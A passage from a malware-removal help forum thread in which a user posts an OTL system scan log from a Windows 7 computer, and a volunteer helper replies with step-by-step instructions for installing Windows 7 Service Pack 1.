[2007/11/07 08:00:40 | 000,000,843 | ---- | M] () -- C:\install.ini
[2007/11/07 08:44:20 | 000,075,280 | ---- | M] (Microsoft Corporation) -- C:\install.res.1028.dll
[2007/11/07 08:44:20 | 000,095,248 | ---- | M] (Microsoft Corporation) -- C:\install.res.1031.dll
[2007/11/07 08:44:20 | 000,090,128 | ---- | M] (Microsoft Corporation) -- C:\install.res.1033.dll
[2007/11/07 08:44:20 | 000,096,272 | ---- | M] (Microsoft Corporation) -- C:\install.res.1036.dll
[2007/11/07 08:44:20 | 000,094,224 | ---- | M] (Microsoft Corporation) -- C:\install.res.1040.dll
[2007/11/07 08:44:20 | 000,080,400 | ---- | M] (Microsoft Corporation) -- C:\install.res.1041.dll
[2007/11/07 08:44:20 | 000,078,864 | ---- | M] (Microsoft Corporation) -- C:\install.res.1042.dll
[2007/11/07 08:44:20 | 000,074,768 | ---- | M] (Microsoft Corporation) -- C:\install.res.2052.dll
[2007/11/07 08:44:20 | 000,095,248 | ---- | M] (Microsoft Corporation) -- C:\install.res.3082.dll
[2011/12/05 08:06:30 | 000,000,722 | -H-- | M] () -- C:\IPH.PH
[2013/03/09 09:38:00 | 000,000,945 | ---- | M] () -- C:\iweb.conf
[2011/06/19 14:07:27 | 000,000,864 | ---- | M] () -- C:\net_save.dna
[2014/01/02 22:55:42 | 4275,298,304 | -HS- | M] () -- C:\pagefile.sys
[2013/07/03 14:03:49 | 000,000,064 | ---- | M] () -- C:\pwsafe.key
[2014/01/02 22:56:20 | 000,000,144 | ---- | M] () -- C:\service.log
[2011/12/10 11:24:04 | 000,000,237 | ---- | M] () -- C:\user.js
[2007/11/07 08:00:40 | 000,005,686 | ---- | M] () -- C:\vcredist.bmp
[2007/11/07 07:09:22 | 001,442,522 | ---- | M] () -- C:\VC_RED.cab
[2007/11/07 07:12:28 | 000,232,960 | ---- | M] () -- C:\VC_RED.MSI
[2012/05/21 08:13:55 | 000,134,976 | ---- | M] () -- C:\wubildr
[2012/05/21 08:13:55 | 000,008,192 | ---- | M] () -- C:\wubildr.mbr
 
< %systemroot%\Fonts\*.com >
[2009/07/14 00:32:31 | 000,026,040 | ---- | M] () -- C:\Windows\Fonts\GlobalMonospace.CompositeFont
[2009/07/14 00:32:31 | 000,026,489 | ---- | M] () -- C:\Windows\Fonts\GlobalSansSerif.CompositeFont
[2009/07/14 00:32:31 | 000,029,779 | ---- | M] () -- C:\Windows\Fonts\GlobalSerif.CompositeFont
[2009/07/14 00:32:31 | 000,043,318 | ---- | M] () -- C:\Windows\Fonts\GlobalUserInterface.CompositeFont
 
< %systemroot%\Fonts\*.dll >
 
< %systemroot%\Fonts\*.ini >
[2009/06/10 15:49:50 | 000,000,065 | ---- | M] () -- C:\Windows\Fonts\desktop.ini
 
< %systemroot%\Fonts\*.ini2 >
 
< %systemroot%\Fonts\*.exe >
 
< %systemroot%\system32\spool\prtprocs\w32x86\*.* >
 
< %systemroot%\REPAIR\*.bak1 >
 
< %systemroot%\REPAIR\*.ini >
 
< %systemroot%\system32\*.jpg >
 
< %systemroot%\*.jpg >
 
< %systemroot%\*.png >
 
< %systemroot%\*.scr >
[2012/03/08 17:37:20 | 000,302,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\WLXPGSS.SCR
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
< %systemroot%\*._sy >
 
< %APPDATA%\Adobe\Update\*.* >
 
< %ALLUSERSPROFILE%\Favorites\*.* >
 
< %APPDATA%\Microsoft\*.* >
 
< %PROGRAMFILES%\*.* >
[2009/07/13 23:54:24 | 000,000,174 | -HS- | M] () -- C:\Program Files (x86)\desktop.ini
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
< %APPDATA%\Update\*.* >
 
< %systemroot%\*. /mp /s >
 
< dir "%systemdrive%\*" /S /A:L /C >
 Volume in drive C has no label.
 Volume Serial Number is 98ED-CF17
 Directory of C:\
07/14/2009  12:08 AM    <JUNCTION>     Documents and Settings [C:\Users]
               0 File(s)              0 bytes
 Directory of C:\ProgramData
07/14/2009  12:08 AM    <JUNCTION>     Application Data [C:\ProgramData]
07/14/2009  12:08 AM    <JUNCTION>     Desktop [C:\Users\Public\Desktop]
07/14/2009  12:08 AM    <JUNCTION>     Documents [C:\Users\Public\Documents]
07/14/2009  12:08 AM    <JUNCTION>     Favorites [C:\Users\Public\Favorites]
07/14/2009  12:08 AM    <JUNCTION>     Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
07/14/2009  12:08 AM    <JUNCTION>     Templates [C:\ProgramData\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users
07/14/2009  12:08 AM    <SYMLINKD>     All Users [C:\ProgramData]
07/14/2009  12:08 AM    <JUNCTION>     Default User [C:\Users\Default]
               0 File(s)              0 bytes
 Directory of C:\Users\All Users
07/14/2009  12:08 AM    <JUNCTION>     Application Data [C:\ProgramData]
07/14/2009  12:08 AM    <JUNCTION>     Desktop [C:\Users\Public\Desktop]
07/14/2009  12:08 AM    <JUNCTION>     Documents [C:\Users\Public\Documents]
07/14/2009  12:08 AM    <JUNCTION>     Favorites [C:\Users\Public\Favorites]
07/14/2009  12:08 AM    <JUNCTION>     Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
07/14/2009  12:08 AM    <JUNCTION>     Templates [C:\ProgramData\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Default
07/14/2009  12:08 AM    <JUNCTION>     Application Data [C:\Users\Default\AppData\Roaming]
07/14/2009  12:08 AM    <JUNCTION>     Local Settings [C:\Users\Default\AppData\Local]
07/14/2009  12:08 AM    <JUNCTION>     My Documents [C:\Users\Default\Documents]
07/14/2009  12:08 AM    <JUNCTION>     NetHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
07/14/2009  12:08 AM    <JUNCTION>     PrintHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
07/14/2009  12:08 AM    <JUNCTION>     Recent [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent]
07/14/2009  12:08 AM    <JUNCTION>     SendTo [C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo]
07/14/2009  12:08 AM    <JUNCTION>     Start Menu [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu]
07/14/2009  12:08 AM    <JUNCTION>     Templates [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Default\AppData\Local
07/14/2009  12:08 AM    <JUNCTION>     Application Data [C:\Users\Default\AppData\Local]
07/14/2009  12:08 AM    <JUNCTION>     History [C:\Users\Default\AppData\Local\Microsoft\Windows\History]
07/14/2009  12:08 AM    <JUNCTION>     Temporary Internet Files [C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Users\Default\Documents
07/14/2009  12:08 AM    <JUNCTION>     My Music [C:\Users\Default\Music]
07/14/2009  12:08 AM    <JUNCTION>     My Pictures [C:\Users\Default\Pictures]
07/14/2009  12:08 AM    <JUNCTION>     My Videos [C:\Users\Default\Videos]
               0 File(s)              0 bytes
 Directory of C:\Users\Public\Documents
07/14/2009  12:08 AM    <JUNCTION>     My Music [C:\Users\Public\Music]
07/14/2009  12:08 AM    <JUNCTION>     My Pictures [C:\Users\Public\Pictures]
07/14/2009  12:08 AM    <JUNCTION>     My Videos [C:\Users\Public\Videos]
               0 File(s)              0 bytes
 Directory of C:\Users\Wesley
12/16/2010  12:28 AM    <JUNCTION>     Application Data [C:\Users\Wesley\AppData\Roaming]
12/16/2010  12:28 AM    <JUNCTION>     Cookies [C:\Users\Wesley\AppData\Roaming\Microsoft\Windows\Cookies]
12/16/2010  12:28 AM    <JUNCTION>     Local Settings [C:\Users\Wesley\AppData\Local]
12/16/2010  12:28 AM    <JUNCTION>     My Documents [C:\Users\Wesley\Documents]
12/16/2010  12:28 AM    <JUNCTION>     NetHood [C:\Users\Wesley\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
12/16/2010  12:28 AM    <JUNCTION>     PrintHood [C:\Users\Wesley\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
12/16/2010  12:28 AM    <JUNCTION>     Recent [C:\Users\Wesley\AppData\Roaming\Microsoft\Windows\Recent]
12/16/2010  12:28 AM    <JUNCTION>     SendTo [C:\Users\Wesley\AppData\Roaming\Microsoft\Windows\SendTo]
12/16/2010  12:28 AM    <JUNCTION>     Start Menu [C:\Users\Wesley\AppData\Roaming\Microsoft\Windows\Start Menu]
12/16/2010  12:28 AM    <JUNCTION>     Templates [C:\Users\Wesley\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Wesley\AppData\Local
12/16/2010  12:28 AM    <JUNCTION>     Application Data [C:\Users\Wesley\AppData\Local]
12/16/2010  12:28 AM    <JUNCTION>     History [C:\Users\Wesley\AppData\Local\Microsoft\Windows\History]
12/16/2010  12:28 AM    <JUNCTION>     Temporary Internet Files [C:\Users\Wesley\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Users\Wesley\Documents
12/16/2010  12:28 AM    <JUNCTION>     My Music [C:\Users\Wesley\Music]
12/16/2010  12:28 AM    <JUNCTION>     My Pictures [C:\Users\Wesley\Pictures]
12/16/2010  12:28 AM    <JUNCTION>     My Videos [C:\Users\Wesley\Videos]
               0 File(s)              0 bytes
 Directory of C:\Windows\System32\config\systemprofile
06/19/2011  08:59 AM    <JUNCTION>     Application Data [C:\Windows\system32\config\systemprofile\AppData\Roaming]
06/19/2011  08:59 AM    <JUNCTION>     Local Settings [C:\Windows\system32\config\systemprofile\AppData\Local]
06/19/2011  08:59 AM    <JUNCTION>     My Documents [C:\Windows\system32\config\systemprofile\Documents]
06/19/2011  08:59 AM    <JUNCTION>     NetHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
06/19/2011  08:59 AM    <JUNCTION>     PrintHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
06/19/2011  08:59 AM    <JUNCTION>     Recent [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Recent]
06/19/2011  08:59 AM    <JUNCTION>     SendTo [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\SendTo]
06/19/2011  08:59 AM    <JUNCTION>     Start Menu [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu]
06/19/2011  08:59 AM    <JUNCTION>     Templates [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Windows\System32\config\systemprofile\AppData\Local
06/19/2011  08:59 AM    <JUNCTION>     Application Data [C:\Windows\system32\config\systemprofile\AppData\Local]
06/19/2011  08:59 AM    <JUNCTION>     History [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History]
06/19/2011  08:59 AM    <JUNCTION>     Temporary Internet Files [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Windows\System32\config\systemprofile\Documents
06/19/2011  08:59 AM    <JUNCTION>     My Music [C:\Windows\system32\config\systemprofile\Music]
06/19/2011  08:59 AM    <JUNCTION>     My Pictures [C:\Windows\system32\config\systemprofile\Pictures]
06/19/2011  08:59 AM    <JUNCTION>     My Videos [C:\Windows\system32\config\systemprofile\Videos]
               0 File(s)              0 bytes
 Directory of C:\Windows\SysWOW64\config\systemprofile
06/19/2011  08:59 AM    <JUNCTION>     Application Data [C:\Windows\system32\config\systemprofile\AppData\Roaming]
06/19/2011  08:59 AM    <JUNCTION>     Local Settings [C:\Windows\system32\config\systemprofile\AppData\Local]
06/19/2011  08:59 AM    <JUNCTION>     My Documents [C:\Windows\system32\config\systemprofile\Documents]
06/19/2011  08:59 AM    <JUNCTION>     NetHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
06/19/2011  08:59 AM    <JUNCTION>     PrintHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
06/19/2011  08:59 AM    <JUNCTION>     Recent [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Recent]
06/19/2011  08:59 AM    <JUNCTION>     SendTo [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\SendTo]
06/19/2011  08:59 AM    <JUNCTION>     Start Menu [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu]
06/19/2011  08:59 AM    <JUNCTION>     Templates [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Windows\SysWOW64\config\systemprofile\AppData\Local
06/19/2011  08:59 AM    <JUNCTION>     Application Data [C:\Windows\system32\config\systemprofile\AppData\Local]
06/19/2011  08:59 AM    <JUNCTION>     History [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History]
06/19/2011  08:59 AM    <JUNCTION>     Temporary Internet Files [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Windows\SysWOW64\config\systemprofile\Documents
06/19/2011  08:59 AM    <JUNCTION>     My Music [C:\Windows\system32\config\systemprofile\Music]
06/19/2011  08:59 AM    <JUNCTION>     My Pictures [C:\Windows\system32\config\systemprofile\Pictures]
06/19/2011  08:59 AM    <JUNCTION>     My Videos [C:\Windows\system32\config\systemprofile\Videos]
               0 File(s)              0 bytes
     Total Files Listed:
               0 File(s)              0 bytes
              79 Dir(s)  251,784,978,432 bytes free
 
< %systemroot%\System32\config\*.sav >
 
< %PROGRAMFILES%\bak. /s >
 
< %systemroot%\system32\bak. /s >
 
< %ALLUSERSPROFILE%\Start Menu\*.lnk /x >
 
< %systemroot%\system32\config\systemprofile\*.dat /x >
 
< %systemroot%\*.config >
 
< %systemroot%\system32\*.db >
 
< %PROGRAMFILES%\Internet Explorer\*.dat >
 
< %APPDATA%\Microsoft\Internet Explorer\Quick Launch\*.lnk /x >
[2012/03/08 20:02:16 | 000,000,221 | -HS- | M] () -- C:\Users\Wesley\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
 
< %USERPROFILE%\Desktop\*.exe >
[2014/01/02 23:21:44 | 004,745,728 | ---- | M] (AVAST Software) -- C:\Users\Wesley\Desktop\aswMBR.exe
[2012/05/14 13:32:39 | 002,322,184 | ---- | M] (ESET) -- C:\Users\Wesley\Desktop\esetsmartinstaller_enu.exe
[2014/01/02 07:58:31 | 000,388,608 | ---- | M] (Trend Micro Inc.) -- C:\Users\Wesley\Desktop\HiJackThis(1).exe
[2013/10/05 01:42:08 | 000,388,608 | ---- | M] (Trend Micro Inc.) -- C:\Users\Wesley\Desktop\HiJackThis.exe
[2014/01/03 07:49:28 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Wesley\Desktop\OTL(1).exe
[2012/02/01 06:58:08 | 002,168,392 | ---- | M] () -- C:\Users\Wesley\Desktop\PWI_v580_Installer.exe
[2014/01/02 23:08:40 | 000,987,410 | ---- | M] () -- C:\Users\Wesley\Desktop\SecurityCheck.exe
 
< %PROGRAMFILES%\Common Files\*.* >
 
< %systemroot%\*.src >
 
< %systemroot%\install\*.* >
 
< %systemroot%\system32\DLL\*.* >
 
< %systemroot%\system32\HelpFiles\*.* >
 
< %systemroot%\system32\rundll\*.* >
 
< %systemroot%\winn32\*.* >
 
< %systemroot%\Java\*.* >
 
< %systemroot%\system32\test\*.* >
 
< %systemroot%\system32\Rundll32\*.* >
 
< %systemroot%\AppPatch\Custom\*.* >
 
< HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU >
 
< HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\Results\Install|LastSuccessTime /rs >
 
========== Base Services ==========
SRV:64bit: - [2009/07/13 20:40:01 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:64bit: - [2009/07/13 20:40:01 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:64bit: - [2009/07/13 20:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:64bit: - [2009/07/13 20:41:53 | 000,848,384 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:64bit: - [2009/07/13 20:40:10 | 000,703,488 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:64bit: - [2011/11/17 02:05:16 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)
SRV:64bit: - [2009/07/13 20:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2009/07/13 20:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:64bit: - [2009/07/13 20:40:13 | 000,136,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:64bit: - [2009/07/13 20:40:24 | 000,175,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV - [2009/07/13 20:15:07 | 000,135,680 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)
SRV:64bit: - [2009/07/13 20:41:53 | 000,509,440 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:64bit: - [2009/07/13 20:40:28 | 000,314,368 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2009/07/13 20:15:11 | 000,253,440 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:64bit: - [2011/03/03 01:17:10 | 000,182,272 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:64bit: - [2009/07/13 20:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)
SRV:64bit: - [2009/07/13 20:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2009/07/13 20:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:64bit: - [2009/07/13 20:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:64bit: - [2009/07/13 20:41:10 | 000,500,224 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:64bit: - [2009/07/13 20:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:64bit: - [2009/07/13 20:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:64bit: - [2009/07/13 20:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:64bit: - [2009/07/13 20:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)
SRV - [2009/07/13 20:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)
SRV:64bit: - [2009/07/13 20:41:52 | 000,302,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:64bit: - [2009/07/13 20:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:64bit: - [2011/05/24 06:21:59 | 000,404,992 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:64bit: - [2010/08/21 01:29:47 | 000,558,592 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:64bit: - [2011/11/17 02:05:16 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)
No service found with a name of EMDMgmt
SRV:64bit: - [2009/07/13 20:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:
- [2009/07/13 20:41:53 | 000,343,552 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:
- [2009/07/13 20:41:53 | 000,509,440 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:
- [2009/07/13 20:41:53 | 000,030,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:
- [2011/11/17 02:05:16 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:
- [2009/07/13 20:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:
- [2010/08/27 01:14:02 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:
- [2009/07/13 20:41:54 | 000,369,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2009/07/13 20:16:14 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:
- [2010/11/02 00:16:53 | 001,114,624 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:
- [2009/07/13 20:41:55 | 000,316,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2009/07/13 20:16:15 | 000,241,664 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:
- [2009/07/13 20:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:
- [2009/07/13 20:41:53 | 000,208,384 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:
- [2009/07/13 20:39:50 | 001,598,976 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:
- [2009/07/13 20:40:04 | 000,676,864 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)
SRV:[b]64bit:
- [2009/07/13 20:40:04 | 000,676,864 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:
- [2009/07/13 20:41:53 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
No service found with a name of WinDefend
SRV:[b]64bit:
- [2009/07/13 20:41:56 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)
SRV:[b]64bit:
- [2009/07/13 20:41:27 | 000,824,832 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:
- [2009/07/13 20:41:56 | 000,578,560 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:
- [2009/07/13 20:39:21 | 000,127,488 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msiexec.exe -- (msiserver)
SRV - [2009/07/13 20:14:25 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:
- [2009/07/13 20:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:
- [2009/07/13 20:41:58 | 002,418,176 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:
- [2009/07/13 20:40:32 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:
- [2009/07/13 20:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)
SRV:[b]64bit:
- [2009/07/13 20:41:56 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)
 
========== Drive Information ==========
 
Physical Drives
---------------
 
Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: Hitachi HDS721010CLA332 ATA Device
Partitions: 2
Status: OK
Status Info: 0
 
Drive: \\\\.\\PHYSICALDRIVE1 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD20EARX-00PASB0 ATA Device
Partitions: 1
Status: OK
Status Info: 0
 
Drive: \\\\.\\PHYSICALDRIVE2 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD20EARX-00PASB0 ATA Device
Partitions: 1
Status: OK
Status Info: 0
 
Partitions
---------------
 
DeviceID: Disk #0, Partition #0
PartitionType: Installable File System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 1048576
Hidden sectors: 0
 
 
DeviceID: Disk #0, Partition #1
PartitionType: Installable File System
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 931.00GB
Starting Offset: 105906176
Hidden sectors: 0
 
 
DeviceID: Disk #1, Partition #0
PartitionType: Installable File System
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 1,863.00GB
Starting Offset: 1048576
Hidden sectors: 0
 
 
DeviceID: Disk #2, Partition #0
PartitionType: Installable File System
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 1,863.00GB
Starting Offset: 1048576
Hidden sectors: 0
 
 
========== Files - Unicode (All) ==========
[2011/11/21 07:48:07 | 000,000,650 | ---- | M] ()(C:\Users\Wesley\AppData\Local\PMB Fik?s) -- C:\Users\Wesley\AppData\Local\PMB Fik聥s
[2011/11/21 07:48:07 | 000,000,650 | ---- | C] ()(C:\Users\Wesley\AppData\Local\PMB Fik?s) -- C:\Users\Wesley\AppData\Local\PMB Fik聥s

< End of report >

 

It wouldn't provide an Extras.txt

Edit: I've ran it twice and still no Extras.txt

 

Attached Files

  • Attached File  MBR.zip   559bytes   115 downloads

Edited by Midnight Sky, 03 January 2014 - 08:40 AM.


#4 OCD

OCD

    SuperHelper

  • Malware Team
  • 5,574 posts

Posted 03 January 2014 - 12:21 PM

Hi Midnight Sky,

It's not necessary to place your reply in a quote box.

You are running Windows 7 without the latest Service Pack (SP1). Please update to at this time.

bullseye_zpse9eaf36e.gif Windows Update
  • Open Windows Update by clicking the Start button start.jpg. In the search box, type Update, and then, in the list of results, click Windows Update.
  • In the left pane, click Check for updates, and then wait while Windows looks for the latest updates for your computer.
  • If you see a message telling you that important updates are available, or telling you to review important updates, click the message to view and select the important updates to install.
  • In the list, click the important updates for more information. Check the box for Windows 7 Service Pack 1, select the check boxes for any other updates that you want to install, and then click OK.
  • Click Install updates.
  • Read and accept the license terms, and then click Finish if the update requires it. adminshield.jpg Administrator permission required If you're prompted for an administrator password or confirmation, type the password or provide confirmation.
